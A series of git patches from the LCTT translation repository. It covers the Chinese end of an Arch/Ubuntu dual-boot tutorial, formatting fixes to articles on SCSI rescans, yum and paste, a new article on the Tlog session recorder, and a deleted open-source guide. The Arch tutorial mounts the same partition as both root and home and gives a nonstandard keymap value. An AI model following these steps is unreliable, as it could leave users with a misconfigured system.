+ [![为 Archlinux 分区](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/partition-free-space-swap-arch-linux_orig.png)][21] 例如,9.3G - G 表示千兆字节。[![安装 Arch Linux 分区](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/install-arch-linux-partition_orig.png)][22]
+
+如下图所示,选择`primary`进行分区
+ [![将 Arch Linux 的根(root)分区设置成主分区](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/make-arch-linux-root-as-primary-partition_orig.png)][23] 然后选择写分区条目。 [![选择分区安装 Arch](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/select-partition-to-install-arch_orig.png)][24]
+
+键入`yes`,以确认写入分区表。
+ [![确认创建分区并安装 Arch Linux](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/install-arch-linux-confirm-create-partition_orig.png)][25]
+
+然后选择 `Quit`(退出)选项。
+ [![退出 Arch Linux 的‘cfdisk’](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/quit-cfdisk-arch-linux_orig.png)][26] 然后键入:
+
+```fdisk -l```
+
+确认修改
+ [![确认分区修改](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/confirm-partition-changes_orig.png)][27]
+
+然后使用以下命令格式化这个分区:
+```mkfs.ext4 /dev/sda3```
+
+确保您选择的分区是我们创建的最后一个分区,这样我们就不会破坏 Ubuntu 分区。
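+
+如果不确定分区编号,可以先用 `lsblk` 查看一下分区布局,再执行上面的格式化命令(`lsblk` 为 util-linux 自带工具,命令仅作参考):
+
+```lsblk -f```
+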
+ [![完成 Arch Linux 分区安装](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/complete-arch-linux-installation-partition_orig.png)][28]
+
+然后使用以下命令挂载这个分区:
+```mount /dev/sda3 /mnt```
+
+ [![安装基础分区](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/published/mount-base-partition-in-arch-linux.png?1514472693)][29]
+
+用下面的命令创建 `home` 目录:
+```mkdir /mnt/home```
+
+ [![安装家目录](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/published/mount-home-partition-arch-linux.png?1514472866)][30]
+
+用以下命令把 `home` 目录挂载到这个分区上:
+```mount /dev/sda3 /mnt/home```
+
+ [![安装家目录](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/published/make-mount-home-directory.png?1514472960)][31]
+
+现在使用以下命令安装 Archlinux 的基本系统:
+```pacstrap /mnt base```
+
+请确保网络连接正常。
+
+
+接下来开始下载并配置基础系统,所用时间取决于你的网速。
+ [![安装Arch Linux 基础系统](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/published/install-arch-linux-base.png?1514473056)][32]
+
+这一步骤完成后,Arch Linux 的基础系统就安装好了。
+
+基础系统安装完成后,使用以下命令生成 `fstab` 文件:
+```genfstab -U /mnt >> /mnt/etc/fstab```
+
+ [![创建 fstab文件](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/published/create-fstab-file-in-arch-linux.png?1514473226)][33]
+
+在此之后,您需要验证`fstab`文件,使用下面命令:
+```cat /mnt/etc/fstab```
+
+ [![查看fstab文件的终端显示](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/published/cat-fstab-file-data-terminal.png?1514473304)][34]
+
+### 配置 Arch Linux:基础配置
+
+您将需要在安装时配置以下内容:
+1. 系统语言和系统语言环境
+
+2. 系统时区
+
+3. Root用户密码
+
+4. 设置主机名
+
+首先,您需要使用以下命令 chroot(切换根目录)进入新安装的基础系统:
+```arch-chroot /mnt```
+
+#### 系统语言和系统语言环境
+
+然后必须配置系统语言:需要在 `/etc/locale.gen` 文件中取消你需要的本地化条目(例如 `en_US.UTF-8 UTF-8`)的注释。
+键入:
+
+```nano /etc/locale.gen```
+
+然后将 `en_US.UTF-8 UTF-8` 这一行取消注释。
+键入命令:
+
+```locale-gen```
+
+生成本地化设置如下:
+ [![生成本地化配置](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/published/generate-localization-arch-linux.png?1514473406)][35] 相应的需要在`locale.conf`文件中配置 LANG 变量。例如:
+
+```nano /etc/locale.conf```
+
+修改为:
+```LANG=en_US.UTF-8```
+
+配置键盘布局,则在文件`vconsole.conf`中进行更改,如下操作:
+```nano /etc/vconsole.conf```
+
+修改为:
+```KEYMAP=us-eng```
+
+#### 2\. 系统时区
+
+配置时区需要利用以下命令实现:
+```ln -sf /usr/share/zoneinfo/Region/City /etc/localtime```
+
+要查看可用时区,可以在终端使用以下命令:
+
+注意可选时区在屏幕截图中显示为蓝色:
+```ls /usr/share/zoneinfo```
+
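+例如,如果你所在的时区是上海,可以这样设置(时区名仅作示例):
+
+```ln -sf /usr/share/zoneinfo/Asia/Shanghai /etc/localtime```
+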
+ [![配置时区文件](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/published/setup-zonefile-in-arch-linux.png?1514473483)][36] [![配置地区](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/setup-country-zonefile_orig.png)][37] 运行 `hwclock` 命令来生成 `/etc/adjtime`(假设硬件时钟被设置为 UTC):
+
+```# hwclock --systohc```
+
+#### 3\. 配置 Root 用户密码
+
+要为 Arch Linux 系统的 `root` 用户设置密码,请使用:
+```passwd```
+
+为`root`用户提供一个新的密码并确认密码使其生效。
+ [![配置系统用户root密码](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/published/setup-arch-linux-root-password.png?1514473649)][38]
+
+#### 4\. 配置主机名和网络
+
+需要创建主机名文件:
+```nano /etc/hostname```
+
+ [![配置主机名](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/published/set-arch-linux-hostname.png?1514473741)][39]
+
+将名字更改为您的用户名:
+ [![set arch linux username](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/published/set-arch-linux-username.png?1514473822)][40] 然后向主机添加一个匹配的条目:
+
+```nano /etc/hosts```
+
+```
+127.0.0.1 localhost.localdomain localhost
+::1 localhost.localdomain localhost
+127.0.1.1 LinuxandUbuntu.localdomain LinuxandUbuntu
+```
+
+
+
+您需要让网络在重启后自动连接,为此启用 DHCP 客户端服务:
+```systemctl enable dhcpcd```
+
+#### 配置 Grub
+
+然后重启机器,进入 Ubuntu 配置 grub。
+你可以键入:
+```reboot```
+
+ [![安装完成后重启](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/published/reboot-system-after-arch-linux-installation.png?1514474180)][41]
+
+Arch Linux 安装仍然没有出现,因此我们需要在 Ubuntu 中使用 `update-grub`来安装它。
+ [![Ubuntu grub 菜单](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/published/ubuntu-grub-menu.png?1514474302)][42] 在Ubuntu中打开终端,输入:
+
+```sudo update-grub```
+
+它应该会更新 grub 配置,把 Arch Linux 的启动项添加进去。
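+
+如果运行后 Arch Linux 仍然没有出现在启动菜单中,可以确认 `os-prober` 已经安装并能探测到它,然后重新生成配置(以下命令仅供参考):
+
+```
+sudo apt install os-prober   # Ubuntu 的 update-grub 依靠 os-prober 探测其它操作系统
+sudo os-prober               # 列出探测到的其它系统,确认其中有 Arch Linux
+sudo update-grub             # 重新生成 grub 配置
+```
+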
+### 小结
+
+祝贺您成功地将 Ubuntu 和 Arch Linux 设置为双启动。Ubuntu 的安装很简单,但 Arch Linux 的安装对 Linux 新手来说是一个挑战。我已尽量让这个教程简单易懂。如果你对这篇文章有任何疑问,请在下面的评论区告诉我,也请把这篇文章分享给你的朋友,帮助他们学习 Linux。
+
+--------------------------------------------------------------------------------
+
+via: http://www.linuxandubuntu.com/home/dual-boot-ubuntu-and-arch-linux
+
+作者:[LinuxAndUbuntu][a]
+译者:[stevenzdg988](https://github.com/stevenzdg988)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:http://www.linuxandubuntu.com
+[1]:http://www.linuxandubuntu.com/home/etcher-burn-images-to-sd-card-make-bootable-usb
+[2]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/bootable-ubuntu-usb-etcher-image-writer_orig.jpg
+[3]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/make-ubuntu-usb-bootable-in-linux_orig.jpg
+[4]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/live-ubuntu-boot_orig.jpg
+[5]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/install-usb-from-live-usb_orig.jpg
+[6]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/custom-partition-hd-install-ubuntu_orig.jpg
+[7]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/create-swap-partition-ubuntu_orig.jpg
+[8]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/install-ubuntu-root-partition_orig.jpg
+[9]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/select-ubuntu-timezone_orig.jpg
+[10]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/install-ubuntu-select-location-keyboard-layout_orig.jpg
+[11]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/create-username-system-name-ubuntu-install_orig.jpg
+[12]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/ubuntu-installation-finishing_orig.jpg
+[13]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/ubuntu-installation-finished_orig.jpg
+[14]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/remove-installation-media-after-ubuntu_orig.jpg
+[15]:http://www.linuxandubuntu.com/home/arch-linux-take-your-linux-knowledge-to-next-level-review
+[16]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/arch-linux-installation-boot-menu_orig.jpg
+[17]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/arch-linux-tty1-linux_orig.png
+[18]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/arch-linux-ping-check-internet-connection_orig.png
+[19]:http://www.linuxandubuntu.com/home/how-to-setup-a-wifi-in-arch-linux-using-terminal
+[20]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/install-arch-partition-disk-with-cfdisk_orig.png
+[21]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/partition-free-space-swap-arch-linux_orig.png
+[22]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/install-arch-linux-partition_orig.png
+[23]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/make-arch-linux-root-as-primary-partition_orig.png
+[24]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/select-partition-to-install-arch_orig.png
+[25]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/install-arch-linux-confirm-create-partition_orig.png
+[26]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/quit-cfdisk-arch-linux_orig.png
+[27]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/confirm-partition-changes_orig.png
+[28]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/complete-arch-linux-installation-partition_orig.png
+[29]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/edited/mount-base-partition-in-arch-linux.png
+[30]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/edited/mount-home-partition-arch-linux.png
+[31]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/edited/make-mount-home-directory.png
+[32]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/edited/install-arch-linux-base.png
+[33]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/edited/create-fstab-file-in-arch-linux.png
+[34]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/edited/cat-fstab-file-data-terminal.png
+[35]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/edited/generate-localization-arch-linux.png
+[36]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/edited/setup-zonefile-in-arch-linux.png
+[37]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/setup-country-zonefile_orig.png
+[38]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/edited/setup-arch-linux-root-password.png
+[39]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/edited/set-arch-linux-hostname.png
+[40]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/edited/set-arch-linux-username.png
+[41]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/edited/reboot-system-after-arch-linux-installation.png
+[42]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/edited/ubuntu-grub-menu.png
From 6f79ed8ca98bfeda64e1377da842dd96f7a99ab9 Mon Sep 17 00:00:00 2001
From: Ezio
Date: Sun, 7 Jan 2018 18:05:24 +0800
Subject: [PATCH 139/371] =?UTF-8?q?=E4=BF=AE=E6=94=B9md=E6=A0=BC=E5=BC=8F?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...a New Hard Disk Without Rebooting Guest.md | 55 +++++++++++++++----
1 file changed, 45 insertions(+), 10 deletions(-)
diff --git a/sources/tech/20090718 Vmware Linux Guest Add a New Hard Disk Without Rebooting Guest.md b/sources/tech/20090718 Vmware Linux Guest Add a New Hard Disk Without Rebooting Guest.md
index e0745af406..0845866f51 100644
--- a/sources/tech/20090718 Vmware Linux Guest Add a New Hard Disk Without Rebooting Guest.md
+++ b/sources/tech/20090718 Vmware Linux Guest Add a New Hard Disk Without Rebooting Guest.md
@@ -1,6 +1,8 @@
translating by lujun9972
+
Vmware Linux Guest Add a New Hard Disk Without Rebooting Guest
======
+
As a system admin, I need to use additional hard drives to provide more storage space or to separate system data from user data. This procedure, adding physical block devices to virtualized guests, describes how to add a hard drive on the host to a virtualized guest using VMWare software running Linux as guest.
It is possible to add or remove a SCSI device explicitly, or to re-scan an entire SCSI bus without rebooting a running Linux VM guest. This how to is tested under Vmware Server and Vmware Workstation v6.0 (but should work with older version too). All instructions are tested on RHEL, Fedora, CentOS and Ubuntu Linux guest / hosts operating systems.
@@ -39,23 +41,37 @@ Finally, set file location and click on Finish.
## Step # 2: Rescan the SCSI Bus to Add a SCSI Device Without rebooting the VM
A rescan can be issued by typing the following command:
-`echo "- - -" > /sys/class/scsi_host/ **host#** /scan
+
+```
+echo "- - -" > /sys/class/scsi_host/ **host#** /scan
fdisk -l
-tail -f /var/log/message`
+tail -f /var/log/message
+```
+
Sample outputs:
+
![Linux Vmware Rescan New Scsi Disk Without Reboot][7]
+
Replace host# with actual value such as host0. You can find scsi_host value using the following command:
+
`# ls /sys/class/scsi_host`
+
Output:
+
```
host0
```
Now type the following to send a rescan request:
-`echo "- - -" > /sys/class/scsi_host/ **host0** /scan
+
+```
+echo "- - -" > /sys/class/scsi_host/ **host0** /scan
fdisk -l
-tail -f /var/log/message`
+tail -f /var/log/message
+```
+
Sample Outputs:
+
```
Jul 18 16:29:39 localhost kernel: Vendor: VMware, Model: VMware Virtual S Rev: 1.0
Jul 18 16:29:39 localhost kernel: Type: Direct-Access ANSI SCSI revision: 02
@@ -96,12 +112,16 @@ Jul 18 16:29:39 localhost kernel: sd 0:0:2:0: Attached scsi generic sg2 type 0
### How Do I Delete a Single Device Called /dev/sdc?
In addition to re-scanning the entire bus, a specific device can be added or existing device deleted using the following command:
-`# echo 1 > /sys/block/devName/device/delete
-# echo 1 > /sys/block/ **sdc** /device/delete`
+
+```
+# echo 1 > /sys/block/devName/device/delete
+# echo 1 > /sys/block/ **sdc** /device/delete
+```
### How Do I Add a Single Device Called /dev/sdc?
To add a single device explicitly, use the following syntax:
+
```
# echo "scsi add-single-device " > /proc/scsi/scsi
```
@@ -116,10 +136,15 @@ Where,
For e.g. add /dev/sdc with host # 0, bus # 0, target # 2, and LUN # 0, enter:
-`# echo "scsi add-single-device 0 0 2 0">/proc/scsi/scsi
+
+```
+# echo "scsi add-single-device 0 0 2 0">/proc/scsi/scsi
# fdisk -l
-# cat /proc/scsi/scsi`
+# cat /proc/scsi/scsi
+```
+
Sample Outputs:
+
```
Attached devices:
Host: scsi0 Channel: 00 Id: 00 Lun: 00
@@ -136,23 +161,31 @@ Host: scsi0 Channel: 00 Id: 02 Lun: 00
## Step #3: Format a New Disk
Now, you can create partition using [fdisk and format it using mkfs.ext3][8] command:
-`# fdisk /dev/sdc
+
+```
+# fdisk /dev/sdc
### [if you want ext3 fs] ###
# mkfs.ext3 /dev/sdc3
### [if you want ext4 fs] ###
-# mkfs.ext4 /dev/sdc3`
+# mkfs.ext4 /dev/sdc3
+```
## Step #4: Create a Mount Point And Update /etc/fstab
`# mkdir /disk3`
+
Open /etc/fstab file, enter:
+
`# vi /etc/fstab`
+
Append as follows:
+
```
/dev/sdc3 /disk3 ext3 defaults 1 2
```
For ext4 fs:
+
```
/dev/sdc3 /disk3 ext4 defaults 1 2
```
@@ -162,7 +195,9 @@ Save and close the file.
#### Optional Task: Label the partition
[You can label the partition using e2label command][9]. For example, if you want to label the new partition /backupDisk, enter
+
`# e2label /dev/sdc1 /backupDisk`
+
See "[The importance of Linux partitions][10]
## about the author
From e9a67e5ae1ede0d5762f178dbdce5160653126b6 Mon Sep 17 00:00:00 2001
From: Ezio
Date: Sun, 7 Jan 2018 18:12:15 +0800
Subject: [PATCH 140/371] =?UTF-8?q?=E4=BF=AE=E6=94=B9=E6=A0=BC=E5=BC=8F?=
=?UTF-8?q?=E7=B2=97=E6=97=A0?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
代码高亮和换行
---
... is package installed to on CentOS-RHEL.md | 20 +++++++++++++++++--
1 file changed, 18 insertions(+), 2 deletions(-)
diff --git a/sources/tech/20180105 yum find out path where is package installed to on CentOS-RHEL.md b/sources/tech/20180105 yum find out path where is package installed to on CentOS-RHEL.md
index b0805e08ec..01fe3928ce 100644
--- a/sources/tech/20180105 yum find out path where is package installed to on CentOS-RHEL.md
+++ b/sources/tech/20180105 yum find out path where is package installed to on CentOS-RHEL.md
@@ -16,13 +16,18 @@ yum is similar to other high level package managers like [apt-get command][3]/[a
### yum where is package installed
The syntax is as follows to install htop package for a demo purpose:
+
`# yum install htop`
+
To list the files installed by a yum package called htop, run the following rpm command:
+
```
# rpm -q {packageNameHere}
# rpm -ql htop
```
+
Sample outputs:
+
```
/usr/bin/htop
/usr/share/doc/htop-2.0.2
@@ -38,9 +43,11 @@ Sample outputs:
### How to see the files installed by a yum package using repoquery command
First install yum-utils package using [yum command][2]:
+
```
# yum install yum-utils
```
+
Sample outputs:
```
@@ -102,15 +109,24 @@ Complete!
### How do I list the contents of an installed package using YUM?
Now run repoquery command as follows:
+
`# repoquery --list htop`
+
OR
+
`# repoquery -l htop`
+
Sample outputs:
+
[![yum where is package installed][5]][5]
+
You can also use the type command or command command to just find location of given binary file such as httpd or htop:
-`$ type -a httpd
+
+```
+$ type -a httpd
$ type -a htop
-$ command -V htop`
+$ command -V htop
+```
### about the author
From f78e406b7cb20b7b00e96c02287ff0e103396b1a Mon Sep 17 00:00:00 2001
From: darksun
Date: Sun, 7 Jan 2018 18:41:23 +0800
Subject: [PATCH 141/371] =?UTF-8?q?=E4=BB=A3=E7=A0=81=E9=AB=98=E4=BA=AE?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
... paste Command Explained For Beginners (5 Examples).md | 8 ++++++++
1 file changed, 8 insertions(+)
diff --git a/sources/tech/20180105 Linux paste Command Explained For Beginners (5 Examples).md b/sources/tech/20180105 Linux paste Command Explained For Beginners (5 Examples).md
index c48115f050..49b1dc763b 100644
--- a/sources/tech/20180105 Linux paste Command Explained For Beginners (5 Examples).md
+++ b/sources/tech/20180105 Linux paste Command Explained For Beginners (5 Examples).md
@@ -37,7 +37,9 @@ Sometimes, there can be a requirement to add a delimiting character between entr
For example, to apply a colon (:) as a delimiting character, use the paste command in the following way:
+```
paste -d : file1.txt file2.txt file3.txt
+```
Here's the output this command produced on our system:
@@ -49,7 +51,9 @@ By default, the paste command merges lines in a way that entries in the first co
This you can do using the **-s** command line option.
+```
paste -s file1.txt file2.txt file3.txt
+```
Following is the output:
@@ -59,7 +63,9 @@ Following is the output:
Yes, you can use multiple delimiters as well. For example, if you want to use both : and |, you can do that in the following way:
+```
paste -d ':|' file1.txt file2.txt file3.txt
+```
Following is the output:
@@ -69,7 +75,9 @@ Following is the output:
By default, lines merged through paste end in a newline. However, if you want, you can make them NUL terminated, something which you can do using the **-z** option.
+```
paste -z file1.txt file2.txt file3.txt
+```
### Conclusion
From 83c2c2507d103f08b866dd4a4bb685479002af08 Mon Sep 17 00:00:00 2001
From: darksun
Date: Sun, 7 Jan 2018 18:42:05 +0800
Subject: [PATCH 142/371] add done: 20180105 Linux paste Command Explained For
Beginners (5 Examples).md
---
... Linux paste Command Explained For Beginners (5 Examples).md | 2 ++
1 file changed, 2 insertions(+)
diff --git a/sources/tech/20180105 Linux paste Command Explained For Beginners (5 Examples).md b/sources/tech/20180105 Linux paste Command Explained For Beginners (5 Examples).md
index 49b1dc763b..b426279815 100644
--- a/sources/tech/20180105 Linux paste Command Explained For Beginners (5 Examples).md
+++ b/sources/tech/20180105 Linux paste Command Explained For Beginners (5 Examples).md
@@ -9,7 +9,9 @@ But before we do that, it's worth mentioning that all examples mentioned in this
As already mentioned above, the paste command merges lines of files. Here's the tool's syntax:
+```
paste [OPTION]... [FILE]...
+```
And here's how the man page of paste explains it:
```
From 479069acaf044e2fa0fd1ed269115d09d513a119 Mon Sep 17 00:00:00 2001
From: darksun
Date: Sun, 7 Jan 2018 18:59:58 +0800
Subject: [PATCH 143/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Tlog=20-=20A=20To?=
=?UTF-8?q?ol=20to=20Record=20/=20Play=20Terminal=20IO=20and=20Sessions?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
... Record - Play Terminal IO and Sessions.md | 92 +++++++++++++++++++
1 file changed, 92 insertions(+)
create mode 100644 sources/tech/20180104 Tlog - A Tool to Record - Play Terminal IO and Sessions.md
diff --git a/sources/tech/20180104 Tlog - A Tool to Record - Play Terminal IO and Sessions.md b/sources/tech/20180104 Tlog - A Tool to Record - Play Terminal IO and Sessions.md
new file mode 100644
index 0000000000..09ed8ec879
--- /dev/null
+++ b/sources/tech/20180104 Tlog - A Tool to Record - Play Terminal IO and Sessions.md
@@ -0,0 +1,92 @@
+Tlog - A Tool to Record / Play Terminal IO and Sessions
+======
+Tlog is a terminal I/O recording and playback package for Linux Distros. It's suitable for implementing centralized user session recording. It logs everything that passes through as JSON messages. The primary purpose of logging in JSON format is to eventually deliver the recorded data to a storage service such as Elasticsearch, where it can be searched and queried, and from where it can be played back. At the same time, they retain all the passed data and timing.
+
+Tlog contains three tools namely tlog-rec, tlog-rec-session and tlog-play.
+
+ * `Tlog-rec tool` is used for recording terminal input or output of programs or shells in general.
+ * `Tlog-rec-session tool` is used for recording I/O of whole terminal sessions, with protection from recorded users.
+ * `Tlog-play tool` for playing back the recordings.
+
+
+
+In this article, I'll explain how to install Tlog on a CentOS 7.4 server.
+
+### Installation
+
+Before proceeding with the install, we need to ensure that our system meets all the software requirements for compiling and installing the application. On the first step, update your system repositories and software packages by using the below command.
+```
+#yum update
+```
+
+We need to install the required dependencies for this software installation. I've installed all dependency packages with these commands prior to the installation.
+```
+#yum install wget gcc
+#yum install systemd-devel json-c-devel libcurl-devel m4
+```
+
+After completing these installations, we can download the [source package][1] for this tool and extract it on your server as required:
+```
+#wget https://github.com/Scribery/tlog/releases/download/v3/tlog-3.tar.gz
+#tar -xvf tlog-3.tar.gz
+# cd tlog-3
+```
+
+Now you can start building this tool using our usual configure and make approach.
+```
+#./configure --prefix=/usr --sysconfdir=/etc && make
+#make install
+#ldconfig
+```
+
+Finally, you need to run `ldconfig`. It creates the necessary links and cache to the most recent shared libraries found in the directories specified on the command line, in the file /etc/ld.so.conf, and in the trusted directories (/lib and /usr/lib).
+
+### Tlog workflow chart
+
+![Tlog working process][2]
+
+First, a user authenticates to log in via PAM. The Name Service Switch (NSS) tells the system that the user's shell is `tlog`. This initiates the tlog session: tlog collects information from the Env/config files about the actual shell, starts that shell in a PTY, and then logs everything passing between the terminal and the PTY via syslog or sd-journal.
+
+### Usage
+
+You can test if session recording and playback work in general with a freshly installed tlog, by recording a session into a file with `tlog-rec` and then playing it back with `tlog-play`.
+
+#### Recording to a file
+
+To record a session into a file, execute `tlog-rec` on the command line as such:
+```
+tlog-rec --writer=file --file-path=tlog.log
+```
+
+This command will record our terminal session to a file named tlog.log and save it in the path specified in the command.
+
+#### Playing back from a file
+
+You can playback the recorded session during or after recording using `tlog-play` command.
+```
+tlog-play --reader=file --file-path=tlog.log
+```
+
+This command reads the previously recorded file tlog.log from the file path mentioned in the command line.
+
+### Wrapping up
+
+Tlog is an open-source package which can be used for implementing centralized user session recording. It is mainly intended to be used as part of a larger user session recording solution, but is designed to be independent and reusable. This tool can be a great help for recording everything users do and storing it safely on the server side for future reference. You can get more details about this package in its [documentation][3]. I hope this article is useful to you. Please post your valuable suggestions and comments below.
+
+### About Saheetha Shameer (the author)
+I'm working as a senior system administrator. I'm a quick learner and have a slight inclination towards following current, emerging trends in the industry. My hobbies include listening to music, playing strategy computer games, reading and gardening. I also have a high passion for experimenting with various culinary delights.
+
+--------------------------------------------------------------------------------
+
+via: https://linoxide.com/linux-how-to/tlog-tool-record-play-terminal-io-sessions/
+
+作者:[Saheetha Shameer][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://linoxide.com/author/saheethas/
+[1]:https://github.com/Scribery/tlog/releases/download/v3/tlog-3.tar.gz
+[2]:https://linoxide.com/wp-content/uploads/2018/01/Tlog-working-process.png
+[3]:https://github.com/Scribery/tlog/blob/master/README.md
From 76f4518296583a95e17b0f6f43c4a72e2e9bce11 Mon Sep 17 00:00:00 2001
From: ChenYi <31087327+cyleft@users.noreply.github.com>
Date: Sun, 7 Jan 2018 20:38:55 +0800
Subject: [PATCH 144/371] Delete 20171201 Launching an Open Source Project A
Free Guide.md
---
...ing an Open Source Project A Free Guide.md | 87 -------------------
1 file changed, 87 deletions(-)
delete mode 100644 sources/tech/20171201 Launching an Open Source Project A Free Guide.md
diff --git a/sources/tech/20171201 Launching an Open Source Project A Free Guide.md b/sources/tech/20171201 Launching an Open Source Project A Free Guide.md
deleted file mode 100644
index dd41e57813..0000000000
--- a/sources/tech/20171201 Launching an Open Source Project A Free Guide.md
+++ /dev/null
@@ -1,87 +0,0 @@
-translating by CYLeft
-
-Launching an Open Source Project: A Free Guide
-============================================================
-
-![](https://www.linuxfoundation.org/wp-content/uploads/2017/11/project-launch-1024x645.jpg)
-
-Launching a project and then rallying community support can be complicated, but the new guide to Starting an Open Source Project can help.
-
-Increasingly, as open source programs become more pervasive at organizations of all sizes, tech and DevOps workers are choosing to or being asked to launch their own open source projects. From Google to Netflix to Facebook, companies are also releasing their open source creations to the community. It’s become common for open source projects to start from scratch internally, after which they benefit from collaboration involving external developers.
-
-Launching a project and then rallying community support can be more complicated than you think, however. A little up-front work can help things go smoothly, and that’s exactly where the new guide to[ Starting an Open Source Project][1] comes in.
-
-This free guide was created to help organizations already versed in open source learn how to start their own open source projects. It starts at the beginning of the process, including deciding what to open source, and moves on to budget and legal considerations, and more. The road to creating an open source project may be foreign, but major companies, from Google to Facebook, have opened up resources and provided guidance. In fact, Google has[ an extensive online destination][2] dedicated to open source best practices and how to open source projects.
-
-“No matter how many smart people we hire inside the company, there’s always smarter people on the outside,” notes Jared Smith, Open Source Community Manager at Capital One. “We find it is worth it to us to open source and share our code with the outside world in exchange for getting some great advice from people on the outside who have expertise and are willing to share back with us.”
-
-In the new guide, noted open source expert Ibrahim Haddad provides five reasons why an organization might open source a new project:
-
-1. Accelerate an open solution; provide a reference implementation to a standard; share development costs for strategic functions
-
-2. Commoditize a market; reduce prices of non-strategic software components.
-
-3. Drive demand by building an ecosystem for your products.
-
-4. Partner with others; engage customers; strengthen relationships with common goals.
-
-5. Offer your customers the ability to self-support: the ability to adapt your code without waiting for you.
-
-The guide notes: “The decision to release or create a new open source project depends on your circumstances. Your company should first achieve a certain level of open source mastery by using open source software and contributing to existing projects. This is because consuming can teach you how to leverage external projects and developers to build your products. And participation can bring more fluency in the conventions and culture of open source communities. (See our guides on [Using Open Source Code][3] and [Participating in Open Source Communities][4]) But once you have achieved open source fluency, the best time to start launching your own open source projects is simply ‘early’ and ‘often.’”
-
-The guide also notes that planning can keep you and your organization out of legal trouble. Issues pertaining to licensing, distribution, support options, and even branding require thinking ahead if you want your project to flourish.
-
-“I think it is a crucial thing for a company to be thinking about what they’re hoping to achieve with a new open source project,” said John Mertic, Director of Program Management at The Linux Foundation. “They must think about the value of it to the community and developers out there and what outcomes they’re hoping to get out of it. And then they must understand all the pieces they must have in place to do this the right way, including legal, governance, infrastructure and a starting community. Those are the things I always stress the most when you’re putting an open source project out there.”
-
-The[ Starting an Open Source Project][5] guide can help you with everything from licensing issues to best development practices, and it explores how to seamlessly and safely weave existing open components into your open source projects. It is one of a new collection of free guides from The Linux Foundation and The TODO Group that are all extremely valuable for any organization running an open source program.[ The guides are available][6]now to help you run an open source program office where open source is supported, shared, and leveraged. With such an office, organizations can establish and execute on their open source strategies efficiently, with clear terms.
-
-These free resources were produced based on expertise from open source leaders.[ Check out all the guides here][7] and stay tuned for our continuing coverage.
-
-Also, don’t miss the previous articles in the series:
-
-[How to Create an Open Source Program][8]
-
-[Tools for Managing Open Source Programs][9]
-
